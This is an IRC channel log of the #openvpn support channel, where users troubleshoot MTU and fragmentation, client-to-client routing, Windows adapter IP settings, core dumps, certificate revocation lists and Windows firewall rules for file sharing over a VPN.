20:49 -!- hrenovo_ [~hrenovo@ool-4352bbfe.dyn.optonline.net] has quit [Quit: I quit]
20:54 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn
20:56 < hrenovo> sorry I got kicked off
20:56 < hrenovo> and I don't have logging enabled
20:57 < Poster> spacedust I believe this will show it in realtime
20:57 < Poster> sudo tcpdump -i eth0 icmp[0] = 3 and icmp[1] = 4
20:57 < hrenovo> someone gave me a link here earlier about windows firewall for vpn
20:57 < hrenovo> Poster: is this for me ?
20:57 -!- Volkswagner [~eric@cpe-24-161-55-139.hvc.res.rr.com] has quit [Quit: Leaving]
20:57 < Poster> hrenovo: it could be; though I think you were after-
20:57 < Poster> http://answers.microsoft.com/en-us/windows/forum/windows_7-networking/how-to-enable-ping-response-in-windows-7/5aff5f8d-f138-4c9a-8646-5b3a99f1cae6
20:57 <@vpnHelper> Title: How to enable ping response in windows 7 - Microsoft Community (at answers.microsoft.com)
20:59 < spacedust> Poster: but got any idea why the iptables thingy doesn't work ?
21:00 < Poster> there may not be any fragmentation needed packets
21:00 < Poster> is tcpdump returning anything?
21:00 < spacedust> Poster: impossible. i just sent a ping of 14000 bytes
21:00 < spacedust> that needs fragmentation
21:01 < spacedust> 1 0 0 LOG icmp -- * * 0.0.0.0/0 0.0.0.0/0 icmptype 3 code 4 LOG flags 0 level 4 prefix "IPT ICMP Frag Needed: "
21:01 < spacedust> 1 0 0 LOG icmp -- * * 0.0.0.0/0 0.0.0.0/0 icmptype 3 code 4 LOG flags 0 level 4 prefix "IPT ICMP Frag Needed: "
21:01 < spacedust> i have both on the client
21:02 < Poster> try doing a large transfer
21:02 < spacedust> Poster: PING www.google.com (173.194.44.16) 11472(11500) bytes of data.
21:02 < spacedust> Poster: okay
21:02 < Poster> google truncates
21:02 < spacedust> looking at the tcpdump also
21:02 < spacedust> truncates what do you mean ?
21:03 < Poster> ping -s 1000 -c 1 www.google.com
21:03 < Poster> PING www.google.com (74.125.26.99) 1000(1028) bytes of data.
21:03 < Poster> 72 bytes from vh-in-f99.1e100.net (74.125.26.99): icmp_seq=1 ttl=43 (truncated)
21:04 < spacedust> Poster: it didn't say (truncate) at the end of the message ... but i tried www.cnet.com and now it says :)
21:04 < spacedust> but not for google :)
21:04 < hrenovo> the method in the above link worked
21:04 < hrenovo> the first suggestion
21:05 < hrenovo> ok, so ping works to windows clients now
21:05 < hrenovo> which is nice
21:05 < hrenovo> but this will not apply for file sharing if i'm not mistaken
21:06 < hrenovo> what exactly does client-to-client do ?
21:06 < Poster> yep, you have to open those individually
21:06 < spacedust> btw what does this truncate mean ?
21:06 < spacedust> Poster: the tcpdump shows me nothing at all
21:06 < Poster> client-to-client allows VPN clients to connect to each other
21:06 < Poster> VPN client A can ping VPN client B across the VPN link
21:07 < hrenovo> but besides pinging
21:07 < Poster> file sharing, printing, video, whatever you can do over a network
21:08 < hrenovo> is client-to-client enough for file & printer sharing ?
21:08 < hrenovo> oh
21:08 < hrenovo> nice !
21:08 < Poster> between clients yes
21:08 < hrenovo> yeah that's cool
21:08 < Poster> you don't need it if the files and printers are behind the VPN server
21:08 < hrenovo> so the rest is just firewall ?
21:08 < Poster> mostly
21:09 < Poster> be careful with client to client though, you leave all other clients exposed to a possibly malicious client or client with malware
21:10 < hrenovo> let me try something really quick. I will try to access a computer that already has active file shares across the network.
21:10 < hrenovo> but I want to access the file shares on the openvpn interface. it should work right ?
21:10 < spacedust> Poster: i have no single packet failure , looking with mtr www.cnet.com which is 20hops away :) openvpn ROX !
21:10 < spacedust> THANKS OPENVPN
21:11 < Poster> hrenovo: yes it can
21:11 < Poster> remember that OpenVPN is just creating a virtual network, so anything you can do on a network, you can (pretty much) do on an OpenVPN link
21:12 < Poster> you generally just have to cope with less bandwidth and higher latency
21:14 < spacedust> Poster: i know its a bit offtopic but its a network related question
21:14 < spacedust> my eth0 has two ips :)
21:14 < hrenovo> hah! it worked
21:14 < spacedust> one is in /25 and the other in /24 :P
21:14 < spacedust> same ip different networks, how could i remove it and readd it ?
21:14 < spacedust> manually
21:15 < Poster> so you have say an eth0 with a subnet mask of 255.255.255.0 and eth0:0 with a subnet mask of 255.255.255.128 ?
21:18 < spacedust> http://openvpn.net/archive/openvpn-users/2004-11/msg00649.html hahh + If your data stream is compressible, you can potentially gain back all of + 8bytes more :P
21:18 <@vpnHelper> Title: Re: [Openvpn-users] Overhead added to each packet by OpenVPN? (at openvpn.net)
21:18 < spacedust> Poster: no :)
21:19 < spacedust> Poster: i have eth0 with ip x.x.x.x/24 bcast:24 ... netmask/24 ...
21:19 < spacedust> and on the same eth0 i have xx.x.x./24 bcast:24 ... netmask/24 :)
21:19 < Poster> two different IP addresses, both /24 ?
21:20 -!- jaded-g0n [~pizo@113.210.96.159] has quit [Ping timeout: 276 seconds]
21:24 < hrenovo> Poster: so far so good, everything is very smooth
21:25 < hrenovo> Poster: I wonder which NAS device for home would work nicely as an openvpn client ? Which manufacturer / model ?
21:27 < Poster> I really don't know, I usually just bang around with old hardware and open source software
21:28 < Poster> if you want a true NAS device I'd imagine you'd want something with some variation of a known supported platform
21:29 < Poster> that being said, something based on Windows, BSD or Linux might be usable, most devices have specialized versions
21:29 < Poster> so the needed components may have been removed
21:30 < Poster> do you have hardware you want to use or are you just shopping?
21:31 < Poster> keep in mind you can also use an old broadband router with OpenWRT or DD-WRT to use for OpenVPN services
21:31 < hrenovo> well I have dd-wrt
21:32 < hrenovo> I had an openvpn server set up in dd-wrt a few years back
21:32 < hrenovo> I wonder if it can be used as a client
21:32 < Poster> yep
21:32 < Poster> the same binary can do either, it depends on which configuration you point it to
21:34 < hrenovo> let me check the settings
21:34 < hrenovo> I hope it can all be configured as a client using the dd-wrt gui
21:39 < Poster> I would imagine so
21:41 -!- jaded-g0n [~pizo@113.210.102.139] has joined #openvpn
21:42 < jaded-g0n> --ifconfig local ad
21:42 < jaded-g0n> dress and the internal DHCP server address -- both are set to 10.9.0.254 -- plea
21:42 < jaded-g0n> se use the --ip-win32 dynamic option to choose a different free address from the
21:42 < jaded-g0n> Is this a conflict of internal ip?
21:42 < jaded-g0n> sorry my english is macibai
21:44 < jaded-g0n> i guess nobody is lanjiao around to answer it?
21:44 < jaded-g0n> =-(
21:45 < Poster> I am just guessing, but I think you need to use a unique IP address for the OpenVPN server
21:45 < Poster> not used on your local ethernet adapter
21:45 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
21:49 -!- master_of_master [~master_of@p4FF24C20.dip.t-dialin.net] has quit [Ping timeout: 246 seconds]
21:50 -!- master_of_master [~master_of@p4FF24934.dip.t-dialin.net] has joined #openvpn
22:11 -!- Sickness\ [~stront@unaffiliated/s-work] has quit [Read error: Operation timed out]
22:15 < jaded-g0n> what does ip-win32 do?
22:26 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has joined #openvpn
22:26 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has quit [Changing host]
22:26 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn
22:45 < pekster> jaded-g0n: It lets you decide how to have Windows assign the IP to the virtual adapter. The 'adaptive' setting is the default, and that error message you got is suggesting you try the 'dynamic' setting instead
22:52 -!- brute11k [~brute@89.249.235.123] has joined #openvpn
22:54 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds]
23:00 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Quit: I quit]
23:04 -!- master_o1_master [~master_of@p4FF24E68.dip.t-dialin.net] has joined #openvpn
23:08 -!- master_of_master [~master_of@p4FF24934.dip.t-dialin.net] has quit [Ping timeout: 264 seconds]
23:20 < jaded-g0n> pekster: so how do i tell openvpn to try the "dynamic" setting?
23:20 < jaded-g0n> is it a configuration on the server, or client, or both?
23:23 < pekster> client. And you set the directive I just noted with the dynamic setting. The manpage will help if you're still confused if you search for --ip-win32
23:34 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
--- Day changed Thu Mar 21 2013
00:17 -!- brute11k [~brute@89.249.235.123] has quit [Ping timeout: 264 seconds]
00:28 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 276 seconds]
00:44 -!- master_o1_master [~master_of@p4FF24E68.dip.t-dialin.net] has quit [Ping timeout: 246 seconds]
00:46 -!- master_of_master [~master_of@p4FF24E30.dip.t-dialin.net] has joined #openvpn
00:53 < jaded-g0n> !man
00:53 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend!
00:55 < pekster> So, 'ip-win32 dynamic' to use the dynamic option
00:55 < pekster> Add leading dashes if you're supplying it on the command line (dashes are optional in your config file)
01:07 -!- master_o1_master [~master_of@p4FF24F08.dip.t-dialin.net] has joined #openvpn
01:10 -!- master_of_master [~master_of@p4FF24E30.dip.t-dialin.net] has quit [Ping timeout: 258 seconds]
01:15 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds]
01:17 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
01:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
01:40 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection]
01:43 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
01:54 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
01:55 -!- master_of_master [~master_of@p4FF24555.dip.t-dialin.net] has joined #openvpn
01:59 -!- master_o1_master [~master_of@p4FF24F08.dip.t-dialin.net] has quit [Ping timeout: 264 seconds]
02:23 -!- Wulf4 [~Wulf@unaffiliated/wulf] has joined #openvpn
02:26 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 260 seconds]
02:47 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn
02:55 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
03:05 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has joined #openvpn
03:15 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
03:18 -!- y4h0 [~yavor@78.128.23.17] has joined #openvpn
03:18 < y4h0> hey there
03:18 < y4h0> do i need to restart openvpn when i made a change in server.conf ?
03:18 <@EugeneKay> Yes.
03:19 < y4h0> tnk you
03:26 -!- JackWinter1 [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"]
03:28 -!- JackWinter1 [~jack@ppp-256.vo.lu] has joined #openvpn
03:31 -!- JackWinter1 [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"]
03:36 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn
03:44 -!- mirco_ [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn
03:45 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Ping timeout: 252 seconds]
03:45 -!- mirco_ is now known as mirco
03:46 -!- jaded-g0n [~pizo@113.210.102.139] has quit [Ping timeout: 276 seconds]
04:10 -!- master_o1_master [~master_of@p4FF24415.dip.t-dialin.net] has joined #openvpn
04:12 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
04:14 -!- master_of_master [~master_of@p4FF24555.dip.t-dialin.net] has quit [Ping timeout: 276 seconds]
04:23 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
04:38 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has quit [Quit: Orbi]
04:52 -!- master_of_master [~master_of@p4FF24EC6.dip.t-dialin.net] has joined #openvpn
04:55 -!- master_o1_master [~master_of@p4FF24415.dip.t-dialin.net] has quit [Ping timeout: 252 seconds]
05:41 -!- tcamuso_ [tcamuso@nat/redhat/x-baiqpapqcpburuam] has joined #openvpn
05:46 -!- jaded-g0n [~pizo@ks-112-190.tm.net.my] has joined #openvpn
06:16 -!- brute11k [~brute@89.249.231.53] has joined #openvpn
06:18 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds]
06:34 < spacedust> hi
06:35 < spacedust> is mtu-test a good way to test if mtu settings are correct ? i am guessing so :) just want to make sure its foolproof :)
06:40 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Quit: Saliendo]
06:45 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn
06:51 -!- jaded-g0n [~pizo@ks-112-190.tm.net.my] has quit []
06:52 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn
06:57 -!- Cr4zi3 [killaz@staff.xbins.org] has quit [Ping timeout: 245 seconds]
07:01 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn
07:02 < kjs> Getting a weird issue... OpenVPN is dog slow, I restart the service and it's fast then gets slower and slower to a total crawl.
07:14 <@ecrist> tcp or udp?
07:18 < kjs> udp
07:18 <@ecrist> what version of openvpn?
07:19 -!- novaflash is now known as novaflash_away
07:19 -!- novaflash_away is now known as novaflash
07:20 < kjs> ecrist: openvpn-2.2.2-1.el6.rf.i686
07:20 <@ecrist> upgrade to 2.3.0 and see if your problem persists
07:21 < kjs> it's running on a cluster, that's not possible right now.
07:21 <@ecrist> feel free to come back when that's done. :)
07:21 < havoc> kjs: try monitoring bandwidth usage, and cpu usage
07:22 < kjs> is this a known problem in 2.2.0 then ecrist ?
07:22 < havoc> also make sure there is no firewalling/shaping in effect that could be throttling the traffic
07:23 <@ecrist> kjs: there are a ton of fixes in 2.3, so it's hard to say. we only support the most recent version of openvpn here, and try not to dwell on past releases.
07:23 < kjs> understood
07:41 < spacedust> makes sense to support latest development :)
07:42 < spacedust> the mtu-test results are : openvpn[2992]: NOTE: Empirical MTU test completed [Tried,Actual] local->remote=[1557,1557] remote->local=[1557,1557]
07:42 < spacedust> so what does that conclude ? that i'm using a 1557 mtu ?
08:10 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds]
08:11 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn
08:21 -!- master_o1_master [~master_of@p4FF24AE2.dip.t-dialin.net] has joined #openvpn
08:24 -!- master_of_master [~master_of@p4FF24EC6.dip.t-dialin.net] has quit [Ping timeout: 264 seconds]
08:30 < MacGyver> Hmm.
08:30 < MacGyver> ^CThu Mar 21 14:28:33 2013 RESOLVE: signal received during DNS resolution attempt
08:30 < MacGyver> Segmentation fault
08:30 < MacGyver> My guess is that's a bug?
08:31 < MacGyver> (I did send the sigterm. The segmentation fault is what I mean.)
08:43 -!- xbanux [~xbanux@triband-mum-59.182.175.131.mtnl.net.in] has joined #openvpn
08:45 <@ecrist> did you get a core dump?
08:46 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
08:46 -!- y4h0 [~yavor@78.128.23.17] has quit [Ping timeout: 258 seconds]
08:51 -!- y4h0 [~yavor@78.128.23.17] has joined #openvpn
08:58 < MacGyver> Unfortunately, coredumps aren't enabled by default on this machine.
08:58 < MacGyver> I can try to reproduce.
08:58 <@ecrist> what version of openvpn?
08:58 <@ecrist> a core dump would be needed to really do much, unless we can find a way to reproduce
08:58 < MacGyver> OpenVPN 2.3.0 i686-pc-linux-gnu [SSL (OpenSSL)] [LZO] [EPOLL] [eurephia] [MH] [IPv6] built on Feb 9 2013
08:58 < MacGyver> On arch linux, 32 bit.
08:59 < MacGyver> Anything special I have to do for OpenVPN to enable dumps?
08:59 < MacGyver> Or is the ulimit enough?
09:00 <@ecrist> I think it's just the ulimit
09:01 < MacGyver> Oh, hmm.
09:01 < MacGyver> Maaaybe it díd generate a dump.
09:02 < MacGyver> Apparently the dump pattern for systemd-based systems makes it end up in the systemctl-log.
09:03 < MacGyver> Hmm, nope.
09:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
09:05 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection timed out]
09:08 < MacGyver> Right, core dumps enabled, let's try to reproduce.
09:09 < MacGyver> Which means I'll be afk for a sec, it involves shutting off the phone (USB-tethered), waiting for DNS-resolutions to fail and then sigterming :P
09:12 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn
09:13 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Read error: Connection reset by peer]
09:15 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
09:21 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
09:25 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
09:25 < MacGyver> Hmm.
09:25 < MacGyver> Nope.
09:25 < MacGyver> Clean shutdown this time.
09:26 < MacGyver> Could be a race condition, since usually it takes a while before the process reports receiving the signal, and this time it was instant.
09:26 < MacGyver> I'll leave coredumps enabled.
09:32 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.4.0]
09:35 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
09:39 -!- y4h0 [~yavor@78.128.23.17] has quit [Ping timeout: 256 seconds]
09:44 -!- y4h0 [~yavor@78.128.23.17] has joined #openvpn
09:44 -!- y4h0 [~yavor@78.128.23.17] has quit [Client Quit]
09:48 < MacGyver> Supposing I set the ulimit on coredumps for root to unlimited, but only for root. If I then start an openvpn process as root *which then drops privileges*, will it generate a coredump?
09:48 < MacGyver> I figure this is general kernel behaviour and not distro-specific, so that's why I might as well ask here as well.
09:48 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]]
09:50 -!- xbanux [~xbanux@triband-mum-59.182.175.131.mtnl.net.in] has quit [Ping timeout: 256 seconds]
09:51 <@ecrist> MacGyver: no, it won't
09:51 <@ecrist> because it's not a root process at that point
09:51 < MacGyver> But ulimits are set at the start of the process, are they not?
09:52 < MacGyver> (I don't want to enable coredumps for all users and groups by default.)
09:52 < MacGyver> (But I will if I have to.)
09:53 <@ecrist> MacGyver: try not dropping privs for now, or enabling coredumps for the owner of the openvpn process
09:55 < MacGyver> That would be nobody.
09:55 < MacGyver> As in, literally, nobody.
09:56 * MacGyver has no idea if and how ulimits are even imposed on that user.
09:56 < MacGyver> And not dropping privs "taints" the setup - the segfault might be caused by the fact that it's at that point running as nobody.
09:57 <@ecrist> then, for testing, enable coredumps for everyone
09:58 -!- cippaciong [~cippacion@95.236.151.104] has joined #openvpn
09:58 -!- cippaciong [~cippacion@95.236.151.104] has left #openvpn ["WeeChat 0.4.0"]
10:04 -!- matsh [divine@nanogene.org] has quit [Ping timeout: 252 seconds]
10:05 < MacGyver> Ah, I think I understand why it won't be dumped.
10:06 < MacGyver> The flag set by PR_SET_DUMPABLE gets cleared when a program drops privs, if I understand this correctly.
10:06 < MacGyver> And it's too much effort to fix this "cleanly".
10:06 < MacGyver> So coredumps, coredumps for everyone! it is.
10:10 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection]
10:10 -!- xbanux [~xbanux@triband-mum-59.182.175.131.mtnl.net.in] has joined #openvpn
10:10 -!- cippaciong [~cippacion@95.236.151.104] has joined #openvpn
10:11 < cippaciong> !welcome
10:11 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
10:11 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
10:12 < cippaciong> hello
10:12 < cippaciong> I was asking how to use the 192.168.0.0/24 ip class in openvpn
10:12 < cippaciong> but I think it's not a good idea
10:12 < cippaciong> 16:11 @vpnHelper » !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
10:13 < rob0> If you have any users using off-the-shelf routers, including many public wifi hotspots, they're not going to be able to route to those networks through your VPN.
10:14 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
10:15 < cippaciong> let's say I just entered my LAN using the VPN and I have ip 10.8.0.6
10:15 < cippaciong> and in my LAN PCs have 192.168.0.X ips
10:15 < cippaciong> how can I ping/do anything with them?
10:16 < cippaciong> If I ping the server with 192.168.0.9 (the server ip) it doesn't work
10:16 < cippaciong> but if I use 10.8.0.1 then it works
10:19 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
10:21 -!- cippaciong [~cippacion@95.236.151.104] has quit [Remote host closed the connection]
10:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 240 seconds]
10:23 -!- cippaciong [~cippacion@95.236.151.104] has joined #openvpn
10:25 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
10:26 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving]
10:34 < rob0> !serverlan'
10:34 < rob0> !serverlan
10:34 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
10:34 < rob0> see the flowchart
10:37 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
10:39 < cippaciong> thanks rob0
10:40 < cippaciong> OT isn't vpnHelper supposed to give me those messages also when querying it?
10:41 < rob0> I'm not sure. Probably, but you'd have to do something like "/msg vpnHelper whatis #openvpn serverlan"
10:41 < rob0> (not tested)
10:42 < rob0> !factoids
10:42 <@vpnHelper> "factoids" is A semi-regularly updated dump of the factoids database is available at http://www.secure-computing.net/factoids.php
10:42 < cippaciong> thanks again
10:42 < rob0> ^^ might be of interest
10:42 < cippaciong> btw the msg method works
10:43 < rob0> cool
10:46 < cippaciong> I have to go now, I'll study a bit and then come back again :D
10:46 < cippaciong> thanks again rob0
10:46 -!- cippaciong [~cippacion@95.236.151.104] has quit [Quit: WeeChat 0.4.0]
10:51 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco]
10:58 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
11:00 -!- raidz_away is now known as raidz
11:02 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
11:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
11:32 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Remote host closed the connection]
11:32 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn
11:32 -!- mode/#openvpn [+o plaisthos] by ChanServ
11:45 < jzaw> !route_outside_openvpn
11:45 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png
11:49 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
11:49 < jzaw> !tunortap
11:49 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
11:49 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
12:02 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
12:02 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
12:02 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
12:02 -!- mode/#openvpn [+o krzee] by ChanServ
12:04 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
12:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
12:10 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn
12:12 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
12:43 < Olipro> if you modify a CRL file, can OpenVPN 2.3 be SIGHUP/SIGUSR1'd to reload it?
12:47 < rob0> hmm, I would think that the CRL would be read for every new/renewed connection, not just at startup time
12:48 <@EugeneKay> I believe the CRL, like the rest of the x.509 stuff, is reloaded when you reinit (triggered by ping-restart or SIGUSR1), but I'm not sure
12:48 <@EugeneKay> Feel free to test
12:48 < pekster> Correct, if you have a --crl-verify updating the file takes effect right away
12:49 < pekster> However, remember that currently connected clients will *not* be disconnected (kill them manually via management or restart to kick everyone off) until the re-keying, done hourly by default
12:50 <@dazo> Olipro: IIRC ... the CRL should be re-read on each check, to ensure it's up-to-date ... I think that was what I found out when testing it many years ago, but my memory is a bit vague now
12:50 < Olipro> what about if a CRL'd client is already connected?
12:51 < Olipro> any way to have it re-read and bounce someone who's been revoked?
12:51 <@dazo> Olipro: again, IIRC, it does the CRL check on each re-negotiation 12:51 < Olipro> super 12:51 < Olipro> I'll get my PFY to test it later 12:55 -!- JesseC [~JesseCWor@wsip-98-175-20-126.br.br.cox.net] has joined #openvpn 12:56 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 12:57 < pekster> Olipro: My SOP for revoking a currently valid cert is to revoke, publish CRL, check status of server (status file or USR2 signal in logs) and then use the management interface to 'kill' the connection if active. A temporary mitigating 'disable' entry can be put in the ccd file too, while you deal with the CRL stuff 13:01 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 13:02 -!- dazo is now known as dazo_afk 13:10 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 272 seconds] 13:14 -!- epochwolf [~root@unaffiliated/epochwolf] has left #openvpn ["Textual IRC Client: http://www.textualapp.com/"] 13:14 -!- timmmaaaayyy [~timmmaaaa@cpe-68-175-79-100.nyc.res.rr.com] has joined #openvpn 13:23 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:24 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 264 seconds] 13:25 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 13:26 -!- mallxs [~mallxs@84.246.31.190] has quit [Quit: ChatZilla 0.9.90 [Iceweasel 10.0.12/20130119084230]] 13:30 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:39 -!- xbanux [~xbanux@triband-mum-59.182.175.131.mtnl.net.in] has quit [Ping timeout: 264 seconds] 13:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 256 seconds] 13:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 14:01 < jzaw> pekster, as i rationalised the use of tcp ... should i really use tcp-delay also ? 
14:01 < jzaw> how critical is that? 14:03 < pekster> --tcp-nolatency? It'll reduce latency at a possible slight reduction in theoretical efficiency (you've already given that up though using tcp anyway) and possibly perform worse in the face of packet loss due to "more" retransmits occurring 14:03 < pekster> Erm, --tcp-nodelay 14:20 < jzaw> yes sorry .. i was typing from memory hehe 14:21 < jzaw> i guess i could do some empirical tests for voip and see how udp tunnels fare 14:22 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 14:24 < hrenovo> greetings. What rule should be enabled in windows 7 firewall for file and printer sharing over openvpn adapter. I enabled to allow all rules listed in inbound rules for file and printer sharing in win7 firewall, but still can't access it when the firewall is turned on. 14:24 < hrenovo> ideas ? 14:26 < pekster> You're better off asking in a channel specializing in Windows configuration, or Windows-centric forums. IIRC, there's a builtin firewall rule for "Printer & File Sharing" or something similar 14:27 < hrenovo> yeah I can see file and printer sharing in the list of inbound firewall rules 14:28 < hrenovo> many of them were disabled meaning it was blocked 14:28 < hrenovo> I enabled all of them, but still can't access shares 14:28 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 14:32 < hrenovo> pekster: the problem is that openvpn installs the adapter on a public interface 14:32 -!- penk [~dave@static-66-137-171-68.axsne.net] has joined #openvpn 14:32 < hrenovo> it should be installed as a private network, but not public 14:32 < hrenovo> that is the main problem 14:33 < penk> hi folks, does anyone know where the connect log on a mac is for the openvpn client? I'm trying to connect to my openvpn server and all I get is a Growl popup "Error" "Connect error" 14:33 < penk> i just reinstalled my mac, other users are fine. this is just local to me. 
